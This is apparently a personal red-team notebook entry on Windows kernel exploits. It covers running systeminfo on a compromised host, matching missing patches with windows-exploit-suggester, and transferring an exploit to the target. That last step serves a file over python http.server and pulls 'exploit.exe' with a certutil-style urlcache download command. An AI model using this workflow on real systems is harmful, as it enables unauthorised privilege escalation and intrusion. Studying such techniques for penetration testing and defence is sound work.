RedTeam
5.Machine
3.Active-Directory
General
Exploitation
5.Exploiting-AD
Specific-Topics
Kernel Exploits

What is Kernel Exploit

A kernel exploit is a type of vulnerability that allows an attacker to execute arbitrary code in the kernel mode of an operating system. The kernel is the central component of an operating system that manages the hardware and software resources of a computer. It is responsible for managing system resources such as memory, processors, and devices, and it provides the interface between the hardware and software of the system.

An attacker may attempt to exploit a vulnerability in the kernel of a Windows machine by checking the update version of the system and comparing it to a database to determine if it has been patched. If the system is not up to date with the latest patches, the attacker may attempt to use a known kernel exploit to gain elevated privileges on the system and potentially install malicious software or modify system settings.

Commands

Once you have compromised a windows machine, simply check the system info

systeminfo

Copy all the output of the document and past it into a file.txt on your attacking machine (Linux)

Check patches & Vulnerabilities

./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2022-...xlss --systeminfo file.txt

Output: [+] ---> Vulnerable [*] ---> Not Vulnerable

More information ---> [[Red Team/6 - Machine/3 - Active Directory/General/Tools/• Windows exploit suggester (NG)]]

Transfer the exploit selected

# Attacking Machine
python3 -m http.server

# Target Machine
-urlcache -f http://IP/exploit.exe newnameofexploit.exe